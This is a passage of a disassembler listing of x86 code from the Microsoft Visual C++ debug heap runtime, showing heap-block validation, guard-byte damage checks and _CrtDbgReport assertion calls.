push 3
call off_451CC0 ; Microsoft VisualC 2-8/net runtime
add esp, 1Ch
test eax, eax
jnz short loc_41CD78
loc_41CD4D: ; CODE XREF: sub_41CCE0+91�j
push offset aClientHookFree ; "Client hook free failure.\n"
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41CD6D
int 3 ; Trap to Debugger
loc_41CD6D: ; CODE XREF: sub_41CCE0+8A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CD4D
jmp loc_41D0C5
; ---------------------------------------------------------------------------
loc_41CD78: ; CODE XREF: sub_41CCE0+6B�j
; sub_41CCE0+CD�j
mov edx, [ebp+arg_0]
push edx
call sub_41D910
add esp, 4
test eax, eax
jnz short loc_41CDA9
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0 ; int
push 414h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41CDA9
int 3 ; Trap to Debugger
loc_41CDA9: ; CODE XREF: sub_41CCE0+A6�j
; sub_41CCE0+C6�j
xor eax, eax
test eax, eax
jnz short loc_41CD78
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+Dst], ecx
loc_41CDB8: ; CODE XREF: sub_41CCE0+12F�j
mov edx, [ebp+Dst]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41CE0B
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 1
jz short loc_41CE0B
mov edx, [ebp+Dst]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41CE0B
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 3
jz short loc_41CE0B
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0 ; int
push 41Ah ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41CE0B
int 3 ; Trap to Debugger
loc_41CE0B: ; CODE XREF: sub_41CCE0+E6�j
; sub_41CCE0+EF�j ...
xor edx, edx
test edx, edx
jnz short loc_41CDB8
mov eax, dword_4518F0
and eax, 4
test eax, eax
jnz loc_41CEE6
push 4
mov cl, byte_4518FC
push ecx
mov edx, [ebp+Dst]
add edx, 1Ch
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41CE80
loc_41CE3D: ; CODE XREF: sub_41CCE0+19E�j
mov eax, [ebp+Dst]
add eax, 20h
push eax
mov ecx, [ebp+Dst]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+Dst]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_451900[ecx*4]
push edx ; char
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 1 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41CE7A
int 3 ; Trap to Debugger
loc_41CE7A: ; CODE XREF: sub_41CCE0+197�j
xor eax, eax
test eax, eax
jnz short loc_41CE3D
loc_41CE80: ; CODE XREF: sub_41CCE0+15B�j
push 4
mov cl, byte_4518FC
push ecx
mov edx, [ebp+Dst]
mov eax, [edx+10h]
mov ecx, [ebp+Dst]
lea edx, [ecx+eax+20h]
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41CEE6
loc_41CEA3: ; CODE XREF: sub_41CCE0+204�j
mov eax, [ebp+Dst]
add eax, 20h
push eax
mov ecx, [ebp+Dst]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+Dst]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_451900[ecx*4]
push edx ; char
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 1 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41CEE0
int 3 ; Trap to Debugger
loc_41CEE0: ; CODE XREF: sub_41CCE0+1FD�j
xor eax, eax
test eax, eax
jnz short loc_41CEA3
loc_41CEE6: ; CODE XREF: sub_41CCE0+13B�j
; sub_41CCE0+1C1�j
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 3
jnz short loc_41CF5B
loc_41CEEF: ; CODE XREF: sub_41CCE0+249�j
mov edx, [ebp+Dst]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_41CF04
mov eax, [ebp+Dst]
cmp dword ptr [eax+18h], 0
jz short loc_41CF25
loc_41CF04: ; CODE XREF: sub_41CCE0+219�j
push offset aPheadNlineIgno ; "pHead->nLine == IGNORE_LINE && pHead->l"...
push 0 ; int
push 42Fh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41CF25
int 3 ; Trap to Debugger
loc_41CF25: ; CODE XREF: sub_41CCE0+222�j
; sub_41CCE0+242�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CEEF
mov edx, [ebp+Dst]
mov eax, [edx+10h]
add eax, 24h
push eax ; Size
xor ecx, ecx
mov cl, byte_4518FD
push ecx ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+Dst]
push eax
call sub_423F30
add esp, 4
jmp loc_41D0C5
; ---------------------------------------------------------------------------
loc_41CF5B: ; CODE XREF: sub_41CCE0+20D�j
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 2
jnz short loc_41CF71
cmp [ebp+arg_4], 1
jnz short loc_41CF71
mov [ebp+arg_4], 2
loc_41CF71: ; CODE XREF: sub_41CCE0+282�j
; sub_41CCE0+288�j ...
mov edx, [ebp+Dst]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41CF9D
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0 ; int
push 43Ch ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41CF9D
int 3 ; Trap to Debugger
loc_41CF9D: ; CODE XREF: sub_41CCE0+29A�j
; sub_41CCE0+2BA�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CF71
mov edx, [ebp+Dst]
mov eax, dword_4F3500
sub eax, [edx+10h]
mov dword_4F3500, eax
mov ecx, dword_4518F0
and ecx, 2
test ecx, ecx
jnz loc_41D09C
mov edx, [ebp+Dst]
cmp dword ptr [edx], 0
jz short loc_41CFDC
mov eax, [ebp+Dst]
mov ecx, [eax]
mov edx, [ebp+Dst]
mov eax, [edx+4]
mov [ecx+4], eax
jmp short loc_41D01A
; ---------------------------------------------------------------------------
loc_41CFDC: ; CODE XREF: sub_41CCE0+2EA�j
; sub_41CCE0+32C�j
mov ecx, dword_4F34F4
cmp ecx, [ebp+Dst]
jz short loc_41D008
push offset a_plastblockPhe ; "_pLastBlock == pHead"
push 0 ; int
push 44Bh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D008
int 3 ; Trap to Debugger
loc_41D008: ; CODE XREF: sub_41CCE0+305�j
; sub_41CCE0+325�j
xor edx, edx
test edx, edx
jnz short loc_41CFDC
mov eax, [ebp+Dst]
mov ecx, [eax+4]
mov dword_4F34F4, ecx
loc_41D01A: ; CODE XREF: sub_41CCE0+2FA�j
mov edx, [ebp+Dst]
cmp dword ptr [edx+4], 0
jz short loc_41D032
mov eax, [ebp+Dst]
mov ecx, [eax+4]
mov edx, [ebp+Dst]
mov eax, [edx]
mov [ecx], eax
jmp short loc_41D06F
; ---------------------------------------------------------------------------
loc_41D032: ; CODE XREF: sub_41CCE0+341�j
; sub_41CCE0+382�j
mov ecx, dword_4F34FC
cmp ecx, [ebp+Dst]
jz short loc_41D05E
push offset a_pfirstblockPh ; "_pFirstBlock == pHead"
push 0 ; int
push 455h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D05E
int 3 ; Trap to Debugger
loc_41D05E: ; CODE XREF: sub_41CCE0+35B�j
; sub_41CCE0+37B�j
xor edx, edx
test edx, edx
jnz short loc_41D032
mov eax, [ebp+Dst]
mov ecx, [eax]
mov dword_4F34FC, ecx
loc_41D06F: ; CODE XREF: sub_41CCE0+350�j
mov edx, [ebp+Dst]
mov eax, [edx+10h]
add eax, 24h
push eax ; Size
xor ecx, ecx
mov cl, byte_4518FD
push ecx ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call _memset
add esp, 0Ch
mov eax, [ebp+Dst]
push eax
call sub_423F30
add esp, 4
jmp short loc_41D0C5
; ---------------------------------------------------------------------------
loc_41D09C: ; CODE XREF: sub_41CCE0+2DE�j
mov ecx, [ebp+Dst]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+Dst]
mov eax, [edx+10h]
push eax ; Size
xor ecx, ecx
mov cl, byte_4518FD
push ecx ; Val
mov edx, [ebp+Dst]
add edx, 20h
push edx ; Dst
call _memset
add esp, 0Ch
loc_41D0C5: ; CODE XREF: sub_41CCE0+49�j
; sub_41CCE0+93�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41CCE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41D0F0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0F0 proc near ; CODE XREF: .text:0041D0D9�p
; __onexit+11�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041D26C SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C928
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi ; char
mov eax, dword_4518F0
and eax, 4
test eax, eax
jz short loc_41D14F
loc_41D11F: ; CODE XREF: sub_41D0F0+5D�j
call sub_41D430
test eax, eax
jnz short loc_41D149
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0 ; int
push 49Dh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D149
int 3 ; Trap to Debugger
loc_41D149: ; CODE XREF: sub_41D0F0+36�j
; sub_41D0F0+56�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D11F
loc_41D14F: ; CODE XREF: sub_41D0F0+2D�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
loc_41D160: ; CODE XREF: sub_41D0F0+A5�j
mov edx, [ebp+arg_0]
push edx
call sub_41D910
add esp, 4
test eax, eax
jnz short loc_41D191
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0 ; int
push 4A9h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D191
int 3 ; Trap to Debugger
loc_41D191: ; CODE XREF: sub_41D0F0+7E�j
; sub_41D0F0+9E�j
xor eax, eax
test eax, eax
jnz short loc_41D160
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+var_20], ecx
loc_41D1A0: ; CODE XREF: sub_41D0F0+107�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41D1F3
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 1
jz short loc_41D1F3
mov edx, [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41D1F3
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41D1F3
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0 ; int
push 4AFh ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D1F3
int 3 ; Trap to Debugger
loc_41D1F3: ; CODE XREF: sub_41D0F0+BE�j
; sub_41D0F0+C7�j ...
xor edx, edx
test edx, edx
jnz short loc_41D1A0
mov eax, [ebp+var_20]
cmp dword ptr [eax+14h], 2
jnz short loc_41D20F
cmp [ebp+arg_4], 1
jnz short loc_41D20F
mov [ebp+arg_4], 2
loc_41D20F: ; CODE XREF: sub_41D0F0+110�j
; sub_41D0F0+116�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+14h], 3
jz short loc_41D24A
loc_41D218: ; CODE XREF: sub_41D0F0+158�j
mov edx, [ebp+var_20]
mov eax, [edx+14h]
cmp eax, [ebp+arg_4]
jz short loc_41D244
push offset aPheadNblockuse ; "pHead->nBlockUse == nBlockUse"
push 0 ; int
push 4B6h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D244
int 3 ; Trap to Debugger
loc_41D244: ; CODE XREF: sub_41D0F0+131�j
; sub_41D0F0+151�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D218
loc_41D24A: ; CODE XREF: sub_41D0F0+126�j
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41D261
jmp short loc_41D26C
sub_41D0F0 endp
; =============== S U B R O U T I N E =======================================
sub_41D261 proc near ; CODE XREF: sub_41D0F0+16A�p
; DATA XREF: .rdata:0043C930�o
push 9
call __unlock
add esp, 4
retn
sub_41D261 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D0F0
loc_41D26C: ; CODE XREF: sub_41D0F0+16F�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41D0F0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, dword_4518F8
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4518F8, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000BD BYTES: COLLAPSED FUNCTION __CrtSetDbgBlockType. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41D35D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtSetDbgBlockType. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, off_451CC0
mov [ebp-4], eax
mov ecx, [ebp+8]
mov off_451CC0, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000088 BYTES: COLLAPSED FUNCTION _CheckBytes. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D430 proc near ; CODE XREF: __heap_alloc_dbg:loc_41C1FC�p
; _realloc_help:loc_41C6B2�p ...
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041D7B0 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CAC0
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov eax, dword_4518F0
and eax, 1
test eax, eax
jnz short loc_41D469
mov eax, 1
jmp loc_41D7B3
; ---------------------------------------------------------------------------
loc_41D469: ; CODE XREF: sub_41D430+2D�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
call unknown_libname_6 ; Microsoft VisualC 2-8/net runtime
mov [ebp+var_24], eax
cmp [ebp+var_24], 0FFFFFFFFh
jz loc_41D58E
cmp [ebp+var_24], 0FFFFFFFEh
jz loc_41D58E
mov ecx, [ebp+var_24]
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
add edx, 6
mov [ebp+var_30], edx
cmp [ebp+var_30], 3
ja loc_41D55C
mov eax, [ebp+var_30]
jmp ds:off_41D7C4[eax*4]
loc_41D4B9: ; CODE XREF: sub_41D430+AD�j
; DATA XREF: .text:0041D7D0�o
push offset a_heapchkFailsW ; "_heapchk fails with _HEAPBADBEGIN.\n"
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D4D9
int 3 ; Trap to Debugger
loc_41D4D9: ; CODE XREF: sub_41D430+A6�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D4B9
jmp loc_41D582
; ---------------------------------------------------------------------------
loc_41D4E4: ; CODE XREF: sub_41D430+82�j
; sub_41D430+D8�j
; DATA XREF: ...
push offset a_heapchkFail_0 ; "_heapchk fails with _HEAPBADNODE.\n"
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D504
int 3 ; Trap to Debugger
loc_41D504: ; CODE XREF: sub_41D430+D1�j
xor edx, edx
test edx, edx
jnz short loc_41D4E4
jmp short loc_41D582
; ---------------------------------------------------------------------------
loc_41D50C: ; CODE XREF: sub_41D430+82�j
; sub_41D430+100�j
; DATA XREF: ...
push offset a_heapchkFail_1 ; "_heapchk fails with _HEAPBADEND.\n"
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D52C
int 3 ; Trap to Debugger
loc_41D52C: ; CODE XREF: sub_41D430+F9�j
xor eax, eax
test eax, eax
jnz short loc_41D50C
jmp short loc_41D582
; ---------------------------------------------------------------------------
loc_41D534: ; CODE XREF: sub_41D430+82�j
; sub_41D430+128�j
; DATA XREF: ...
push offset a_heapchkFail_2 ; "_heapchk fails with _HEAPBADPTR.\n"
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D554
int 3 ; Trap to Debugger
loc_41D554: ; CODE XREF: sub_41D430+121�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D534
jmp short loc_41D582
; ---------------------------------------------------------------------------
loc_41D55C: ; CODE XREF: sub_41D430+79�j
; sub_41D430+150�j
push offset a_heapchkFail_3 ; "_heapchk fails with unknown return valu"...
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D57C
int 3 ; Trap to Debugger
loc_41D57C: ; CODE XREF: sub_41D430+149�j
xor edx, edx
test edx, edx
jnz short loc_41D55C
loc_41D582: ; CODE XREF: sub_41D430+AF�j
; sub_41D430+DA�j ...
mov [ebp+var_1C], 0
jmp loc_41D797
; ---------------------------------------------------------------------------
loc_41D58E: ; CODE XREF: sub_41D430+56�j
; sub_41D430+60�j
mov [ebp+var_1C], 1
mov eax, dword_4F34FC
mov [ebp+var_20], eax
jmp short loc_41D5A7
; ---------------------------------------------------------------------------
loc_41D59F: ; CODE XREF: sub_41D430:loc_41D792�j
mov ecx, [ebp+var_20]
mov edx, [ecx]
mov [ebp+var_20], edx
loc_41D5A7: ; CODE XREF: sub_41D430+16D�j
cmp [ebp+var_20], 0
jz loc_41D797
mov [ebp+var_28], 1
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_41D5EC
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 1
jz short loc_41D5EC
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_41D5EC
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 3
jnz short loc_41D604
loc_41D5EC: ; CODE XREF: sub_41D430+197�j
; sub_41D430+1A0�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_451900[ecx*4]
mov dword ptr [ebp+var_2C], edx
jmp short loc_41D60B
; ---------------------------------------------------------------------------
loc_41D604: ; CODE XREF: sub_41D430+1BA�j
mov dword ptr [ebp+var_2C], offset aDamaged ; "DAMAGED"
loc_41D60B: ; CODE XREF: sub_41D430+1D2�j
push 4
mov al, byte_4518FC
push eax
mov ecx, [ebp+var_20]
add ecx, 1Ch
push ecx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41D660
loc_41D626: ; CODE XREF: sub_41D430+227�j
mov edx, [ebp+var_20]
add edx, 20h
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+18h]
push ecx
mov edx, dword ptr [ebp+var_2C]
push edx ; char
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41D653
int 3 ; Trap to Debugger
loc_41D653: ; CODE XREF: sub_41D430+220�j
xor eax, eax
test eax, eax
jnz short loc_41D626
mov [ebp+var_28], 0
loc_41D660: ; CODE XREF: sub_41D430+1F4�j
push 4
mov cl, byte_4518FC
push ecx
mov edx, [ebp+var_20]
mov eax, [edx+10h]
mov ecx, [ebp+var_20]
lea edx, [ecx+eax+20h]
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41D6BD
loc_41D683: ; CODE XREF: sub_41D430+284�j
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx+18h]
push edx
mov eax, dword ptr [ebp+var_2C]
push eax ; char
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41D6B0
int 3 ; Trap to Debugger
loc_41D6B0: ; CODE XREF: sub_41D430+27D�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D683
mov [ebp+var_28], 0
loc_41D6BD: ; CODE XREF: sub_41D430+251�j
mov edx, [ebp+var_20]
cmp dword ptr [edx+14h], 0
jnz short loc_41D716
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
push ecx
mov dl, byte_4518FD
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41D716
loc_41D6E7: ; CODE XREF: sub_41D430+2DD�j
mov ecx, [ebp+var_20]
add ecx, 20h
push ecx ; char
push offset aDamageOnTopOfF ; "DAMAGE: on top of Free block at 0x%08X."...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D709
int 3 ; Trap to Debugger
loc_41D709: ; CODE XREF: sub_41D430+2D6�j
xor edx, edx
test edx, edx
jnz short loc_41D6E7
mov [ebp+var_28], 0
loc_41D716: ; CODE XREF: sub_41D430+294�j
; sub_41D430+2B5�j
cmp [ebp+var_28], 0
jnz short loc_41D792
mov eax, [ebp+var_20]
cmp dword ptr [eax+8], 0
jz short loc_41D758
loc_41D725: ; CODE XREF: sub_41D430+326�j
mov ecx, [ebp+var_20]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_20]
mov ecx, [eax+8]
push ecx
mov edx, dword ptr [ebp+var_2C]
push edx ; char
push offset aHsAllocatedAtF ; "%hs allocated at file %hs(%d).\n"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41D752
int 3 ; Trap to Debugger
loc_41D752: ; CODE XREF: sub_41D430+31F�j
xor eax, eax
test eax, eax
jnz short loc_41D725
loc_41D758: ; CODE XREF: sub_41D430+2F3�j
; sub_41D430+359�j
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
push edx
mov eax, [ebp+var_20]
add eax, 20h
push eax
mov ecx, dword ptr [ebp+var_2C]
push ecx ; char
push offset aHsLocatedAt0x0 ; "%hs located at 0x%08X is %u bytes long."...
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41D785
int 3 ; Trap to Debugger
loc_41D785: ; CODE XREF: sub_41D430+352�j
xor edx, edx
test edx, edx
jnz short loc_41D758
mov [ebp+var_1C], 0
loc_41D792: ; CODE XREF: sub_41D430+2EA�j
jmp loc_41D59F
; ---------------------------------------------------------------------------
loc_41D797: ; CODE XREF: sub_41D430+159�j
; sub_41D430+17B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_41D7A5
jmp short loc_41D7B0
sub_41D430 endp
; =============== S U B R O U T I N E =======================================
sub_41D7A5 proc near ; CODE XREF: sub_41D430+36E�p
; DATA XREF: .rdata:0043CAC8�o
push 9
call __unlock
add esp, 4
retn
sub_41D7A5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D430
loc_41D7B0: ; CODE XREF: sub_41D430+373�j
mov eax, [ebp+var_1C]
loc_41D7B3: ; CODE XREF: sub_41D430+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41D430
; ---------------------------------------------------------------------------
off_41D7C4 dd offset loc_41D534 ; DATA XREF: sub_41D430+82�r
dd offset loc_41D50C
dd offset loc_41D4E4
dd offset loc_41D4B9
align 10h
; [00000022 BYTES: COLLAPSED FUNCTION __CrtSetDbgFlag. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008D BYTES: COLLAPSED FUNCTION __CrtDoForAllClientObjects. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41D89D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtDoForAllClientObjects. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004B BYTES: COLLAPSED FUNCTION __CrtIsValidPointer. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D910 proc near ; CODE XREF: _realloc_help+1AA�p
; sub_41CCE0+9C�p ...
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
jnz short loc_41D923
xor eax, eax
jmp loc_41DA30
; ---------------------------------------------------------------------------
loc_41D923: ; CODE XREF: sub_41D910+A�j
push 1
push 20h
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call __CrtIsValidPointer
add esp, 0Ch
test eax, eax
jnz short loc_41D941
xor eax, eax
jmp loc_41DA30
; ---------------------------------------------------------------------------
loc_41D941: ; CODE XREF: sub_41D910+28�j
cmp dword_4F3BEC, 3
jnz short loc_41D9AE
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
call ___sbh_find_block
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41D97A
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
mov eax, [ebp+var_4]
push eax
call ___sbh_verify_block
add esp, 8
jmp loc_41DA30
; ---------------------------------------------------------------------------
loc_41D97A: ; CODE XREF: sub_41D910+50�j
mov ecx, dword_4F350C
and ecx, 8000h
test ecx, ecx
jz short loc_41D994
mov eax, 1
jmp loc_41DA30
; ---------------------------------------------------------------------------
loc_41D994: ; CODE XREF: sub_41D910+78�j
mov edx, [ebp+arg_0]
sub edx, 20h
push edx
push 0
mov eax, dword_4F3BE8
push eax
call ds:dword_4F5474 ; HeapValidate
jmp loc_41DA30
; ---------------------------------------------------------------------------
loc_41D9AE: ; CODE XREF: sub_41D910+38�j
cmp dword_4F3BEC, 2
jnz short loc_41DA1A
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
call ___sbh_find_block_0
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_41D9ED
mov ecx, [ebp+var_C]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_41D9E9
mov eax, 1
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41D9E9: ; CODE XREF: sub_41D910+D0�j
xor eax, eax
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41D9ED: ; CODE XREF: sub_41D910+C5�j
mov eax, dword_4F350C
and eax, 8000h
test eax, eax
jz short loc_41DA02
mov eax, 1
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41DA02: ; CODE XREF: sub_41D910+E9�j
mov ecx, [ebp+arg_0]
sub ecx, 20h
push ecx
